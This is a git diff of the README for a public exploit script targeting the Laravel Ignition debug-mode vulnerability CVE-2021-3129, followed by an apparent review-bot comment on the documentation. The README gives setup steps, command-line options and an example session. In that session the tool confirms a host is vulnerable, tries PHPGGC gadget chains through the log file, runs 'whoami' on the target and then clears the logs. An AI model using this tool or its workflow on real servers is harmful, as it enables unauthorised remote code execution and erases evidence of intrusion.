diff --git a/README.md b/README.md index 02cf023..ae8753b 100644 --- a/README.md +++ b/README.md 
@@ -7,90 +7,78 @@ This script allows you to write/execute commands on a website running Laravel It currently has support for searching the log file, executing commands, writing to the log file, and support for clearing log files. ## Setup -``` +```bash $ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git $ cd CVE-2021-3129 -# pip install -r requirements.txt -# python3 CVE-2021-3129.py --help +$ pip install -r requirements.txt +$ python3 CVE-2021-3129.py --help ``` ## Options -``` -usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua] - [--chain CHAIN] [--chains] [--php PHP] +```bash +usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua] [--chain CHAIN] [--chains] [--php PHP] Exploit CVE-2021-3129 - Laravel vulnerability exploit script -optional arguments: +options: -h, --help show this help message and exit --host HOST Host URL to use exploit on --force Force exploit without checking if vulnerable - --log LOG Full path to laravel.log file (e.g. - /var/www/html/storage/logs/laravel.log) + --log LOG Full path to laravel.log file (e.g. /var/www/html/storage/logs/laravel.log) --ua Randomize User-Agent for requests - --chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all - available chains. + --chain CHAIN Select PHPGGC chain. Use "--chains" parameter to view all available chains. --chains View available chains for the "--chain" parameter --php PHP Path to PHP executable ``` ## Example -``` -$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/ +```bash +$ python3 CVE-2021-3129.py --host="http://0.0.0.0/" Laravel Debug Mode CVE script -[•] Made by: https://jvdpoll.nl -[@] Starting exploit on "http://127.0.0.1/public/"... -[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution... +[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129 +[•] Using PHPGGC: https://github.com/ambionics/phpggc +[@] Starting exploit on "http://0.0.0.0/"... 
+[@] Testing vulnerable URL http://0.0.0.0/_ignition/execute-solution... [√] Host seems vulnerable! [@] Searching Laravel log file path... -[•] Log path found: "/home/laravel/web/storage/logs/laravel.log" -[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log". -[•] Laravel version found: "7.22.4". -[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log". +[•] Laravel seems to be running on a Windows based machine. +[√] Laravel log found: "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log". +[•] Laravel version found: "7.30.4". [•] Use "?" for a list of all possible actions. -[?] Please enter a command to execute: help -[•] Available commands: - exit - Exit program. - help - Shows available commands. - clear_logs - Clears Laravel logs. - execute - Execute system command. - write - Write to log file. -[?] Please enter a command to execute: execute ls /home/laravel/web/ -[@] Executing command "ls /home/laravel/web/"... -[@] Generating payload... -[√] Generated payload. +[?] Please enter a command to execute: execute whoami +[@] Executing command "whoami"... +[@] Generating payloads... +[√] Generated 12 payloads. +[@] Trying chain laravel/rce1 [1/12]... +[@] Clearing logs... +[@] Causing error in logs... +[√] Caused error in logs. +[@] Sending payloads... +[√] Sent payload. +[@] Converting payload... +[√] Converted payload. +[!] Failed execution of payload. +Error: "file_get_contents(phar://C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log): failed to open stream: internal corruption of phar "C:\inetpub\wwwroot\Laravel_RCE_POC\storage\logs\laravel.log" (truncated entry)". +[?] Do you want to try the next chain? [Y/N] : y +... +[@] Trying chain laravel/rce8 [6/12]... [@] Clearing logs... -[√] Cleared logs. [@] Causing error in logs... [√] Caused error in logs. -[@] Sending payload... +[@] Sending payloads... [√] Sent payload. [@] Converting payload... [√] Converted payload. 
[√] Result: -README.md -app -artisan -bootstrap -composer.json -composer.lock -config -database -package.json -phpunit.xml -public -resources -routes -server.php -storage -tests -vendor -webpack.mix.js +autorite nt\iusr [@] Clearing logs... -[√] Cleared logs. +[?] Do you want to try the next chain? [Y/N] : n +[?] Please enter a command to execute: clear_logs +[@] Clearing Laravel logs... +[√] Cleared Laravel logs! ``` ## Credits -- [PHPGGC](https://github.com/ambionics/phpggc) \ No newline at end of file +- [PHPGGC](https://github.com/ambionics/phpggc)
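Review bot: the new Example invocation `--host="http://0.0.0.0/"` is a poor sample target, since 0.0.0.0 is the unspecified/wildcard address rather than something a client can send requests to; the previous loopback URL `http://127.0.0.1/public/` or an obviously fictitious hostname would avoid a reader copying a non-working value, and should match the unquoted `--host HOST` form shown in the Options block. Separately, the Setup section still lists only `git clone` and `pip install`, while the Options block exposes `--php PHP  Path to PHP executable` and the example output prints `[•] Using PHPGGC: https://github.com/ambionics/phpggc`, so Setup should state that a local PHP interpreter is a prerequisite and whether PHPGGC is bundled or must be obtained separately.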